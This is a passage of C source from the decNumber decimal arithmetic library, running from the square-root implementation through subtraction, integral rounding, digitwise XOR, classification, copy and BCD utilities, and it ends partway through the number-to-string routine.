*/ /* const approxaddhalf := approx + setexp(.5, -p) */ /* if mulrd(approxaddhalf, approxaddhalf) < f then */ /* approx := approx + setexp(.l, -p + 1) */ /* end if */ /* end if */ /* end */ /* result setexp(approx, e div 2) % fix exponent */ /* end sqrt */ /* ------------------------------------------------------------------ */ decNumber * decNumberSquareRoot(decNumber *res, const decNumber *rhs, decContext *set) { decContext workset, approxset; /* work contexts */ decNumber dzero; /* used for constant zero */ Int maxp; /* largest working precision */ Int workp; /* working precision */ Int residue=0; /* rounding residue */ uInt status=0, ignore=0; /* status accumulators */ uInt rstatus; /* .. */ Int exp; /* working exponent */ Int ideal; /* ideal (preferred) exponent */ Int needbytes; /* work */ Int dropped; /* .. */ #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif /* buffer for f [needs +1 in case DECBUFFER 0] */ decNumber buff[D2N(DECBUFFER+1)]; /* buffer for a [needs +2 to match likely maxp] */ decNumber bufa[D2N(DECBUFFER+2)]; /* buffer for temporary, b [must be same size as a] */ decNumber bufb[D2N(DECBUFFER+2)]; decNumber *allocbuff=NULL; /* -> allocated buff, iff allocated */ decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *allocbufb=NULL; /* -> allocated bufb, iff allocated */ decNumber *f=buff; /* reduced fraction */ decNumber *a=bufa; /* approximation to result */ decNumber *b=bufb; /* intermediate result */ /* buffer for temporary variable, up to 3 digits */ decNumber buft[D2N(3)]; decNumber *t=buft; /* up-to-3-digit constant or work */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; /* [Note: 'f' allocation below could reuse this buffer if */ /* used, but as this is rare they are kept separate for clarity.] */ rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* handle infinities and NaNs */ if (SPECIALARG) { if (decNumberIsInfinite(rhs)) { /* an infinity */ if (decNumberIsNegative(rhs)) status|=DEC_Invalid_operation; else decNumberCopy(res, rhs); /* +Infinity */ } else decNaNs(res, rhs, NULL, set, &status); /* a NaN */ break; } /* calculate the ideal (preferred) exponent [floor(exp/2)] */ /* [We would like to write: ideal=rhs->exponent>>1, but this */ /* generates a compiler warning. Generated code is the same.] */ ideal=(rhs->exponent&~1)/2; /* target */ /* handle zeros */ if (ISZERO(rhs)) { decNumberCopy(res, rhs); /* could be 0 or -0 */ res->exponent=ideal; /* use the ideal [safe] */ /* use decFinish to clamp any out-of-range exponent, etc. */ decFinish(res, set, &residue, &status); break; } /* any other -x is an oops */ if (decNumberIsNegative(rhs)) { status|=DEC_Invalid_operation; break; } /* space is needed for three working variables */ /* f -- the same precision as the RHS, reduced to 0.01->0.99... */ /* a -- Hull's approximation -- precision, when assigned, is */ /* currentprecision+1 or the input argument precision, */ /* whichever is larger (+2 for use as temporary) */ /* b -- intermediate temporary result (same size as a) */ /* if any is too long for local storage, then allocate */ workp=MAXI(set->digits+1, rhs->digits); /* actual rounding precision */ maxp=workp+2; /* largest working precision */ needbytes=sizeof(decNumber)+(D2U(rhs->digits)-1)*sizeof(Unit); if (needbytes>(Int)sizeof(buff)) { allocbuff=(decNumber *)malloc(needbytes); if (allocbuff==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} f=allocbuff; /* use the allocated space */ } /* a and b both need to be able to hold a maxp-length number */ needbytes=sizeof(decNumber)+(D2U(maxp)-1)*sizeof(Unit); if (needbytes>(Int)sizeof(bufa)) { /* [same applies to b] */ allocbufa=(decNumber *)malloc(needbytes); allocbufb=(decNumber *)malloc(needbytes); if (allocbufa==NULL || allocbufb==NULL) { /* hopeless */ status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated spaces */ b=allocbufb; /* .. */ } /* copy rhs -> f, save exponent, and reduce so 0.1 <= f < 1 */ decNumberCopy(f, rhs); exp=f->exponent+f->digits; /* adjusted to Hull rules */ f->exponent=-(f->digits); /* to range */ /* set up working context */ decContextDefault(&workset, DEC_INIT_DECIMAL64); /* [Until further notice, no error is possible and status bits */ /* (Rounded, etc.) should be ignored, not accumulated.] */ /* Calculate initial approximation, and allow for odd exponent */ workset.digits=workp; /* p for initial calculation */ t->bits=0; t->digits=3; a->bits=0; a->digits=3; if ((exp & 1)==0) { /* even exponent */ /* Set t=0.259, a=0.819 */ t->exponent=-3; a->exponent=-3; #if DECDPUN>=3 t->lsu[0]=259; a->lsu[0]=819; #elif DECDPUN==2 t->lsu[0]=59; t->lsu[1]=2; a->lsu[0]=19; a->lsu[1]=8; #else t->lsu[0]=9; t->lsu[1]=5; t->lsu[2]=2; a->lsu[0]=9; a->lsu[1]=1; a->lsu[2]=8; #endif } else { /* odd exponent */ /* Set t=0.0819, a=2.59 */ f->exponent--; /* f=f/10 */ exp++; /* e=e+1 */ t->exponent=-4; a->exponent=-2; #if DECDPUN>=3 t->lsu[0]=819; a->lsu[0]=259; #elif DECDPUN==2 t->lsu[0]=19; t->lsu[1]=8; a->lsu[0]=59; a->lsu[1]=2; #else t->lsu[0]=9; t->lsu[1]=1; t->lsu[2]=8; a->lsu[0]=9; a->lsu[1]=5; a->lsu[2]=2; #endif } decMultiplyOp(a, a, f, &workset, &ignore); /* a=a*f */ decAddOp(a, a, t, &workset, 0, &ignore); /* ..+t */ /* [a is now the initial approximation for sqrt(f), calculated with */ /* currentprecision, which is also a's precision.] */ /* the main calculation loop */ decNumberZero(&dzero); /* make 0 */ decNumberZero(t); /* set t = 0.5 */ t->lsu[0]=5; /* .. */ t->exponent=-1; /* .. */ workset.digits=3; /* initial p */ for (;;) { /* set p to min(2*p - 2, maxp) [hence 3; or: 4, 6, 10, ... , maxp] */ workset.digits=workset.digits*2-2; if (workset.digits>maxp) workset.digits=maxp; /* a = 0.5 * (a + f/a) */ /* [calculated at p then rounded to currentprecision] */ decDivideOp(b, f, a, &workset, DIVIDE, &ignore); /* b=f/a */ decAddOp(b, b, a, &workset, 0, &ignore); /* b=b+a */ decMultiplyOp(a, b, t, &workset, &ignore); /* a=b*0.5 */ if (a->digits==maxp) break; /* have required digits */ } /* loop */ /* Here, 0.1 <= a < 1 [Hull], and a has maxp digits */ /* now reduce to length, etc.; this needs to be done with a */ /* having the correct exponent so as to handle subnormals */ /* correctly */ approxset=*set; /* get emin, emax, etc. */ approxset.round=DEC_ROUND_HALF_EVEN; a->exponent+=exp/2; /* set correct exponent */ rstatus=0; /* clear status */ residue=0; /* .. and accumulator */ decCopyFit(a, a, &approxset, &residue, &rstatus); /* reduce (if needed) */ decFinish(a, &approxset, &residue, &rstatus); /* clean and finalize */ /* Overflow was possible if the input exponent was out-of-range, */ /* in which case quit */ if (rstatus&DEC_Overflow) { status=rstatus; /* use the status as-is */ decNumberCopy(res, a); /* copy to result */ break; } /* Preserve status except Inexact/Rounded */ status|=(rstatus & ~(DEC_Rounded|DEC_Inexact)); /* Carry out the Hull correction */ a->exponent-=exp/2; /* back to 0.1->1 */ /* a is now at final precision and within 1 ulp of the properly */ /* rounded square root of f; to ensure proper rounding, compare */ /* squares of (a - l/2 ulp) and (a + l/2 ulp) with f. */ /* Here workset.digits=maxp and t=0.5, and a->digits determines */ /* the ulp */ workset.digits--; /* maxp-1 is OK now */ t->exponent=-a->digits-1; /* make 0.5 ulp */ decAddOp(b, a, t, &workset, DECNEG, &ignore); /* b = a - 0.5 ulp */ workset.round=DEC_ROUND_UP; decMultiplyOp(b, b, b, &workset, &ignore); /* b = mulru(b, b) */ decCompareOp(b, f, b, &workset, COMPARE, &ignore); /* b ? f, reversed */ if (decNumberIsNegative(b)) { /* f < b [i.e., b > f] */ /* this is the more common adjustment, though both are rare */ t->exponent++; /* make 1.0 ulp */ t->lsu[0]=1; /* .. */ decAddOp(a, a, t, &workset, DECNEG, &ignore); /* a = a - 1 ulp */ /* assign to approx [round to length] */ approxset.emin-=exp/2; /* adjust to match a */ approxset.emax-=exp/2; decAddOp(a, &dzero, a, &approxset, 0, &ignore); } else { decAddOp(b, a, t, &workset, 0, &ignore); /* b = a + 0.5 ulp */ workset.round=DEC_ROUND_DOWN; decMultiplyOp(b, b, b, &workset, &ignore); /* b = mulrd(b, b) */ decCompareOp(b, b, f, &workset, COMPARE, &ignore); /* b ? f */ if (decNumberIsNegative(b)) { /* b < f */ t->exponent++; /* make 1.0 ulp */ t->lsu[0]=1; /* .. */ decAddOp(a, a, t, &workset, 0, &ignore); /* a = a + 1 ulp */ /* assign to approx [round to length] */ approxset.emin-=exp/2; /* adjust to match a */ approxset.emax-=exp/2; decAddOp(a, &dzero, a, &approxset, 0, &ignore); } } /* [no errors are possible in the above, and rounding/inexact during */ /* estimation are irrelevant, so status was not accumulated] */ /* Here, 0.1 <= a < 1 (still), so adjust back */ a->exponent+=exp/2; /* set correct exponent */ /* count droppable zeros [after any subnormal rounding] by */ /* trimming a copy */ decNumberCopy(b, a); decTrim(b, set, 1, &dropped); /* [drops trailing zeros] */ /* Set Inexact and Rounded. The answer can only be exact if */ /* it is short enough so that squaring it could fit in workp digits, */ /* and it cannot have trailing zeros due to clamping, so these are */ /* the only (relatively rare) conditions a careful check is needed */ if (b->digits*2-1 > workp && !set->clamp) { /* cannot fit */ status|=DEC_Inexact|DEC_Rounded; } else { /* could be exact/unrounded */ uInt mstatus=0; /* local status */ decMultiplyOp(b, b, b, &workset, &mstatus); /* try the multiply */ if (mstatus&DEC_Overflow) { /* result just won't fit */ status|=DEC_Inexact|DEC_Rounded; } else { /* plausible */ decCompareOp(t, b, rhs, &workset, COMPARE, &mstatus); /* b ? rhs */ if (!ISZERO(t)) status|=DEC_Inexact|DEC_Rounded; /* not equal */ else { /* is Exact */ /* here, dropped is the count of trailing zeros in 'a' */ /* use closest exponent to ideal... */ Int todrop=ideal-a->exponent; /* most that can be dropped */ if (todrop<0) status|=DEC_Rounded; /* ideally would add 0s */ else { /* unrounded */ if (dropped<todrop) { /* clamp to those available */ todrop=dropped; status|=DEC_Clamped; } if (todrop>0) { /* have some to drop */ decShiftToLeast(a->lsu, D2U(a->digits), todrop); a->exponent+=todrop; /* maintain numerical value */ a->digits-=todrop; /* new length */ } } } } } /* double-check Underflow, as perhaps the result could not have */ /* been subnormal (initial argument too big), or it is now Exact */ if (status&DEC_Underflow) { Int ae=rhs->exponent+rhs->digits-1; /* adjusted exponent */ /* check if truly subnormal */ #if DECEXTFLAG /* DEC_Subnormal too */ if (ae>=set->emin*2) status&=~(DEC_Subnormal|DEC_Underflow); #else if (ae>=set->emin*2) status&=~DEC_Underflow; #endif /* check if truly inexact */ if (!(status&DEC_Inexact)) status&=~DEC_Underflow; } decNumberCopy(res, a); /* a is now the result */ } while(0); /* end protected */ if (allocbuff!=NULL) free(allocbuff); /* drop any storage used */ if (allocbufa!=NULL) free(allocbufa); /* .. */ if (allocbufb!=NULL) free(allocbufb); /* .. */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* .. */ #endif if (status!=0) decStatus(res, status, set);/* then report status */ #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberSquareRoot */ /* ------------------------------------------------------------------ */ /* decNumberSubtract -- subtract two Numbers */ /* */ /* This computes C = A - B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X-X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberSubtract(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decAddOp(res, lhs, rhs, set, DECNEG, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberSubtract */ /* ------------------------------------------------------------------ */ /* decNumberToIntegralExact -- round-to-integral-value with InExact */ /* decNumberToIntegralValue -- round-to-integral-value */ /* */ /* res is the result */ /* rhs is input number */ /* set is the context */ /* */ /* res must have space for any value of rhs. */ /* */ /* This implements the IEEE special operators and therefore treats */ /* special values as valid. For finite numbers it returns */ /* rescale(rhs, 0) if rhs->exponent is <0. */ /* Otherwise the result is rhs (so no error is possible, except for */ /* sNaN). */ /* */ /* The context is used for rounding mode and status after sNaN, but */ /* the digits setting is ignored. The Exact version will signal */ /* Inexact if the result differs numerically from rhs; the other */ /* never signals Inexact. */ /* ------------------------------------------------------------------ */ decNumber * decNumberToIntegralExact(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dn; decContext workset; /* working context */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* handle infinities and NaNs */ if (SPECIALARG) { if (decNumberIsInfinite(rhs)) decNumberCopy(res, rhs); /* an Infinity */ else decNaNs(res, rhs, NULL, set, &status); /* a NaN */ } else { /* finite */ /* have a finite number; no error possible (res must be big enough) */ if (rhs->exponent>=0) return decNumberCopy(res, rhs); /* that was easy, but if negative exponent there is work to do... */ workset=*set; /* clone rounding, etc. */ workset.digits=rhs->digits; /* no length rounding */ workset.traps=0; /* no traps */ decNumberZero(&dn); /* make a number with exponent 0 */ decNumberQuantize(res, rhs, &dn, &workset); status|=workset.status; } if (status!=0) decStatus(res, status, set); return res; } /* decNumberToIntegralExact */ decNumber * decNumberToIntegralValue(decNumber *res, const decNumber *rhs, decContext *set) { decContext workset=*set; /* working context */ workset.traps=0; /* no traps */ decNumberToIntegralExact(res, rhs, &workset); /* this never affects set, except for sNaNs; NaN will have been set */ /* or propagated already, so no need to call decStatus */ set->status|=workset.status&DEC_Invalid_operation; return res; } /* decNumberToIntegralValue */ /* ------------------------------------------------------------------ */ /* decNumberXor -- XOR two Numbers, digitwise */ /* */ /* This computes C = A ^ B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X^X) */ /* lhs is A */ /* rhs is B */ /* set is the context (used for result length and error report) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Logical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* ------------------------------------------------------------------ */ decNumber * decNumberXor(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { const Unit *ua, *ub; /* -> operands */ const Unit *msua, *msub; /* -> operand msus */ Unit *uc, *msuc; /* -> result and its msu */ Int msudigs; /* digits in res msu */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif if (lhs->exponent!=0 || decNumberIsSpecial(lhs) || decNumberIsNegative(lhs) || rhs->exponent!=0 || decNumberIsSpecial(rhs) || decNumberIsNegative(rhs)) { decStatus(res, DEC_Invalid_operation, set); return res; } /* operands are valid */ ua=lhs->lsu; /* bottom-up */ ub=rhs->lsu; /* .. */ uc=res->lsu; /* .. */ msua=ua+D2U(lhs->digits)-1; /* -> msu of lhs */ msub=ub+D2U(rhs->digits)-1; /* -> msu of rhs */ msuc=uc+D2U(set->digits)-1; /* -> msu of result */ msudigs=MSUDIGITS(set->digits); /* [faster than remainder] */ for (; uc<=msuc; ua++, ub++, uc++) { /* Unit loop */ Unit a, b; /* extract units */ if (ua>msua) a=0; else a=*ua; if (ub>msub) b=0; else b=*ub; *uc=0; /* can now write back */ if (a|b) { /* maybe 1 bits to examine */ Int i, j; /* This loop could be unrolled and/or use BIN2BCD tables */ for (i=0; i<DECDPUN; i++) { if ((a^b)&1) *uc=*uc+(Unit)powers[i]; /* effect XOR */ j=a%10; a=a/10; j|=b%10; b=b/10; if (j>1) { decStatus(res, DEC_Invalid_operation, set); return res; } if (uc==msuc && i==msudigs-1) break; /* just did final digit */ } /* each digit */ } /* non-zero */ } /* each unit */ /* [here uc-1 is the msu of the result] */ res->digits=decGetDigits(res->lsu, uc-res->lsu); res->exponent=0; /* integer */ res->bits=0; /* sign=0 */ return res; /* [no status to set] */ } /* decNumberXor */ /* ================================================================== */ /* Utility routines */ /* ================================================================== */ /* ------------------------------------------------------------------ */ /* decNumberClass -- return the decClass of a decNumber */ /* dn -- the decNumber to test */ /* set -- the context to use for Emin */ /* returns the decClass enum */ /* ------------------------------------------------------------------ */ enum decClass decNumberClass(const decNumber *dn, decContext *set) { if (decNumberIsSpecial(dn)) { if (decNumberIsQNaN(dn)) return DEC_CLASS_QNAN; if (decNumberIsSNaN(dn)) return DEC_CLASS_SNAN; /* must be an infinity */ if (decNumberIsNegative(dn)) return DEC_CLASS_NEG_INF; return DEC_CLASS_POS_INF; } /* is finite */ if (decNumberIsNormal(dn, set)) { /* most common */ if (decNumberIsNegative(dn)) return DEC_CLASS_NEG_NORMAL; return DEC_CLASS_POS_NORMAL; } /* is subnormal or zero */ if (decNumberIsZero(dn)) { /* most common */ if (decNumberIsNegative(dn)) return DEC_CLASS_NEG_ZERO; return DEC_CLASS_POS_ZERO; } if (decNumberIsNegative(dn)) return DEC_CLASS_NEG_SUBNORMAL; return DEC_CLASS_POS_SUBNORMAL; } /* decNumberClass */ /* ------------------------------------------------------------------ */ /* decNumberClassToString -- convert decClass to a string */ /* */ /* eclass is a valid decClass */ /* returns a constant string describing the class (max 13+1 chars) */ /* ------------------------------------------------------------------ */ const char *decNumberClassToString(enum decClass eclass) { if (eclass==DEC_CLASS_POS_NORMAL) return DEC_ClassString_PN; if (eclass==DEC_CLASS_NEG_NORMAL) return DEC_ClassString_NN; if (eclass==DEC_CLASS_POS_ZERO) return DEC_ClassString_PZ; if (eclass==DEC_CLASS_NEG_ZERO) return DEC_ClassString_NZ; if (eclass==DEC_CLASS_POS_SUBNORMAL) return DEC_ClassString_PS; if (eclass==DEC_CLASS_NEG_SUBNORMAL) return DEC_ClassString_NS; if (eclass==DEC_CLASS_POS_INF) return DEC_ClassString_PI; if (eclass==DEC_CLASS_NEG_INF) return DEC_ClassString_NI; if (eclass==DEC_CLASS_QNAN) return DEC_ClassString_QN; if (eclass==DEC_CLASS_SNAN) return DEC_ClassString_SN; return DEC_ClassString_UN; /* Unknown */ } /* decNumberClassToString */ /* ------------------------------------------------------------------ */ /* decNumberCopy -- copy a number */ /* */ /* dest is the target decNumber */ /* src is the source decNumber */ /* returns dest */ /* */ /* (dest==src is allowed and is a no-op) */ /* All fields are updated as required. This is a utility operation, */ /* so special values are unchanged and no error is possible. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCopy(decNumber *dest, const decNumber *src) { #if DECCHECK if (src==NULL) return decNumberZero(dest); #endif if (dest==src) return dest; /* no copy required */ /* Use explicit assignments here as structure assignment could copy */ /* more than just the lsu (for small DECDPUN). This would not affect */ /* the value of the results, but could disturb test harness spill */ /* checking. */ dest->bits=src->bits; dest->exponent=src->exponent; dest->digits=src->digits; dest->lsu[0]=src->lsu[0]; if (src->digits>DECDPUN) { /* more Units to come */ const Unit *smsup, *s; /* work */ Unit *d; /* .. */ /* memcpy for the remaining Units would be safe as they cannot */ /* overlap. However, this explicit loop is faster in short cases. */ d=dest->lsu+1; /* -> first destination */ smsup=src->lsu+D2U(src->digits); /* -> source msu+1 */ for (s=src->lsu+1; s<smsup; s++, d++) *d=*s; } return dest; } /* decNumberCopy */ /* ------------------------------------------------------------------ */ /* decNumberCopyAbs -- quiet absolute value operator */ /* */ /* This sets C = abs(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* */ /* C must have space for set->digits digits. */ /* No exception or error can occur; this is a quiet bitwise operation.*/ /* See also decNumberAbs for a checking version of this. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCopyAbs(decNumber *res, const decNumber *rhs) { #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, DECUNCONT)) return res; #endif decNumberCopy(res, rhs); res->bits&=~DECNEG; /* turn off sign */ return res; } /* decNumberCopyAbs */ /* ------------------------------------------------------------------ */ /* decNumberCopyNegate -- quiet negate value operator */ /* */ /* This sets C = negate(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* */ /* C must have space for set->digits digits. */ /* No exception or error can occur; this is a quiet bitwise operation.*/ /* See also decNumberMinus for a checking version of this. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCopyNegate(decNumber *res, const decNumber *rhs) { #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, DECUNCONT)) return res; #endif decNumberCopy(res, rhs); res->bits^=DECNEG; /* invert the sign */ return res; } /* decNumberCopyNegate */ /* ------------------------------------------------------------------ */ /* decNumberCopySign -- quiet copy and set sign operator */ /* */ /* This sets C = A with the sign of B */ /* */ /* res is C, the result. C may be A */ /* lhs is A */ /* rhs is B */ /* */ /* C must have space for set->digits digits. */ /* No exception or error can occur; this is a quiet bitwise operation.*/ /* ------------------------------------------------------------------ */ decNumber * decNumberCopySign(decNumber *res, const decNumber *lhs, const decNumber *rhs) { uByte sign; /* rhs sign */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, DECUNCONT)) return res; #endif sign=rhs->bits & DECNEG; /* save sign bit */ decNumberCopy(res, lhs); res->bits&=~DECNEG; /* clear the sign */ res->bits|=sign; /* set from rhs */ return res; } /* decNumberCopySign */ /* ------------------------------------------------------------------ */ /* decNumberGetBCD -- get the coefficient in BCD8 */ /* dn is the source decNumber */ /* bcd is the uInt array that will receive dn->digits BCD bytes, */ /* most-significant at offset 0 */ /* returns bcd */ /* */ /* bcd must have at least dn->digits bytes. No error is possible; if */ /* dn is a NaN or Infinite, digits must be 1 and the coefficient 0. */ /* ------------------------------------------------------------------ */ uByte * decNumberGetBCD(const decNumber *dn, uint8_t *bcd) { uByte *ub=bcd+dn->digits-1; /* -> lsd */ const Unit *up=dn->lsu; /* Unit pointer, -> lsu */ #if DECDPUN==1 /* trivial simple copy */ for (; ub>=bcd; ub--, up++) *ub=*up; #else /* chopping needed */ uInt u=*up; /* work */ uInt cut=DECDPUN; /* downcounter through unit */ for (; ub>=bcd; ub--) { *ub=(uByte)(u%10); /* [*6554 trick inhibits, here] */ u=u/10; cut--; if (cut>0) continue; /* more in this unit */ up++; u=*up; cut=DECDPUN; } #endif return bcd; } /* decNumberGetBCD */ /* ------------------------------------------------------------------ */ /* decNumberSetBCD -- set (replace) the coefficient from BCD8 */ /* dn is the target decNumber */ /* bcd is the uInt array that will source n BCD bytes, most- */ /* significant at offset 0 */ /* n is the number of digits in the source BCD array (bcd) */ /* returns dn */ /* */ /* dn must have space for at least n digits. No error is possible; */ /* if dn is a NaN, or Infinite, or is to become a zero, n must be 1 */ /* and bcd[0] zero. */ /* ------------------------------------------------------------------ */ decNumber * decNumberSetBCD(decNumber *dn, const uByte *bcd, uInt n) { Unit *up = dn->lsu + D2U(n) - 1; /* -> msu [target pointer] */ const uByte *ub=bcd; /* -> source msd */ #if DECDPUN==1 /* trivial simple copy */ for (; ub<bcd+n; ub++, up--) *up=*ub; #else /* some assembly needed */ /* calculate how many digits in msu, and hence first cut */ Int cut=MSUDIGITS(n); /* [faster than remainder] */ for (;up>=dn->lsu; up--) { /* each Unit from msu */ *up=0; /* will take <=DECDPUN digits */ for (; cut>0; ub++, cut--) *up=X10(*up)+*ub; cut=DECDPUN; /* next Unit has all digits */ } #endif dn->digits=n; /* set digit count */ return dn; } /* decNumberSetBCD */ /* ------------------------------------------------------------------ */ /* decNumberIsNormal -- test normality of a decNumber */ /* dn is the decNumber to test */ /* set is the context to use for Emin */ /* returns 1 if |dn| is finite and >=Nmin, 0 otherwise */ /* ------------------------------------------------------------------ */ Int decNumberIsNormal(const decNumber *dn, decContext *set) { Int ae; /* adjusted exponent */ #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, set)) return 0; #endif if (decNumberIsSpecial(dn)) return 0; /* not finite */ if (decNumberIsZero(dn)) return 0; /* not non-zero */ ae=dn->exponent+dn->digits-1; /* adjusted exponent */ if (ae<set->emin) return 0; /* is subnormal */ return 1; } /* decNumberIsNormal */ /* ------------------------------------------------------------------ */ /* decNumberIsSubnormal -- test subnormality of a decNumber */ /* dn is the decNumber to test */ /* set is the context to use for Emin */ /* returns 1 if |dn| is finite, non-zero, and <Nmin, 0 otherwise */ /* ------------------------------------------------------------------ */ Int decNumberIsSubnormal(const decNumber *dn, decContext *set) { Int ae; /* adjusted exponent */ #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, set)) return 0; #endif if (decNumberIsSpecial(dn)) return 0; /* not finite */ if (decNumberIsZero(dn)) return 0; /* not non-zero */ ae=dn->exponent+dn->digits-1; /* adjusted exponent */ if (ae<set->emin) return 1; /* is subnormal */ return 0; } /* decNumberIsSubnormal */ /* ------------------------------------------------------------------ */ /* decNumberTrim -- remove insignificant zeros */ /* */ /* dn is the number to trim */ /* returns dn */ /* */ /* All fields are updated as required. This is a utility operation, */ /* so special values are unchanged and no error is possible. */ /* ------------------------------------------------------------------ */ decNumber * decNumberTrim(decNumber *dn) { Int dropped; /* work */ decContext set; /* .. */ #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, DECUNCONT)) return dn; #endif decContextDefault(&set, DEC_INIT_BASE); /* clamp=0 */ return decTrim(dn, &set, 0, &dropped); } /* decNumberTrim */ /* ------------------------------------------------------------------ */ /* decNumberVersion -- return the name and version of this module */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ const char * decNumberVersion(void) { return DECVERSION; } /* decNumberVersion */ /* ------------------------------------------------------------------ */ /* decNumberZero -- set a number to 0 */ /* */ /* dn is the number to set, with space for one digit */ /* returns dn */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ /* Memset is not used as it is much slower in some environments. */ decNumber * decNumberZero(decNumber *dn) { #if DECCHECK if (decCheckOperands(dn, DECUNUSED, DECUNUSED, DECUNCONT)) return dn; #endif dn->bits=0; dn->exponent=0; dn->digits=1; dn->lsu[0]=0; return dn; } /* decNumberZero */ /* ================================================================== */ /* Local routines */ /* ================================================================== */ /* ------------------------------------------------------------------ */ /* decToString -- lay out a number into a string */ /* */ /* dn is the number to lay out */ /* string is where to lay out the number */ /* eng is 1 if Engineering, 0 if Scientific */ /* */ /* string must be at least dn->digits+14 characters long */ /* No error is possible. */ /* */ /* Note that this routine can generate a -0 or 0.000. These are */ /* never generated in subset to-number or arithmetic, but can occur */ /* in non-subset arithmetic (e.g., -1*0 or 1.234-1.234). */ /* ------------------------------------------------------------------ */ /* If DECCHECK is enabled the string "?" is returned if a number is */ /* invalid. */ static void decToString(const decNumber *dn, char *string, Flag eng) { Int exp=dn->exponent; /* local copy */ Int e; /* E-part value */ Int pre; /* digits before the '.' */ Int cut; /* for counting digits in a Unit */ char *c=string; /* work [output pointer] */ const Unit *up=dn->lsu+D2U(dn->digits)-1; /* -> msu [input pointer] */ uInt u, pow; /* work */ #if DECCHECK if (decCheckOperands(DECUNRESU, dn, DECUNUSED, DECUNCONT)) { strcpy(string, "?"); return;} #endif if (decNumberIsNegative(dn)) { /* Negatives get a minus */ *c='-'; c++; } if (dn->bits&DECSPECIAL) { /* Is a special value */ if (decNumberIsInfinite(dn)) { strcpy(c, "Inf"); strcpy(c+3, "inity"); return;} /* a NaN */ if (dn->bits&DECSNAN) { /* signalling NaN */ *c='s'; c++; } strcpy(c, "NaN"); c+=3; /* step past */ /* if not a clean non-zero coefficient, that's all there is in a */ /* NaN string */ if (exp!=0 || (*dn->lsu==0 && dn->digits==1)) return; /* [drop through to add integer] */ } /* calculate how many digits in msu, and hence first cut */ cut=MSUDIGITS(dn->digits); /* [faster than remainder] */ cut--; /* power of ten for digit */ if (exp==0) { /* simple integer [common fastpath] */ for (;up>=dn->lsu; up--) { /* each Unit from msu */ u=*up; /* contains DECDPUN digits to lay out */ for (; cut>=0; c++, cut--) TODIGIT(u, cut, c, pow); cut=DECDPUN-1; /* next Unit has all digits */ } *c='\0'; /* terminate the string */ return;} /* non-0 exponent -- assume plain form */ pre=dn->digits+exp; /* digits before '.' */ e=0; /* no E */ if ((exp>0) || (pre<-5)) { /* need exponential form */ e=exp+dn->digits-1; /* calculate E value */ pre=1; /* assume one digit before '.' */ if (eng && (e!=0)) { /* engineering: may need to adjust */ Int adj; /* adjustment */ /* The C remainder operator is undefined for negative numbers, so */ /* a positive remainder calculation must be used here */ if (e<0) { adj=(-e)%3; if (adj!=0) adj=3-adj; } else { /* e>0 */ adj=e%3; } e=e-adj; /* if dealing with zero still produce an exponent which is a */ /* multiple of three, as expected, but there will only be the */ /* one zero before the E, still. Otherwise note the padding. */ if (!ISZERO(dn)) pre+=adj; else { /* is zero */ if (adj!=0) { /* 0.00Esnn needed */ e=e+3; pre=-(2-adj); } } /* zero */ } /* eng */ } /* need exponent */ /* lay out the digits of the coefficient, adding 0s and . as needed */ u=*up; if (pre>0) { /* xxx.xxx or xx00 (engineering) form */ Int n=pre; for (; pre>0; pre--, c++, cut--) { if (cut<0) { /* need new Unit */ if (up==dn->lsu) break; /* out of input digits (pre>digits) */ up--; cut=DECDPUN-1; u=*up; } TODIGIT(u, cut, c, pow); } if (n<dn->digits) { /* more to come, after '.' */ *c='.'; c++; for (;; c++, cut--) { if (cut<0) { /* need new Unit */ if (up==dn->lsu) break; /* out of input digits */ up--; cut=DECDPUN-1; u=*up; } TODIGIT(u, cut, c, pow); } } else for (; pre>0; pre--, c++) *c='0'; /* 0 padding (for engineering) needed */ } else { /* 0.xxx or 0.000xxx form */ *c='0'; c++; *c='.'; c++; for (; pre<0; pre++, c++) *c='0'; /* add any 0's after '.' */ for (; ; c++, cut--) { if (cut<0) { /* need new Unit */ if (up==dn->lsu) break; /* out of input digits */ up--; cut=DECDPUN-1; u=*up; } TODIGIT(u, cut, c, pow); } } /* Finally add the E-part, if needed. It will never be 0, has a base maximum and minimum of +999999999 through -999999999, but could range down to -1999999998 for anormal numbers */ if (e!=0) { Flag had=0; /* 1=had non-zero */ *c='E'; c++; *c='+'; c++; /* assume positive */ u=e; /* 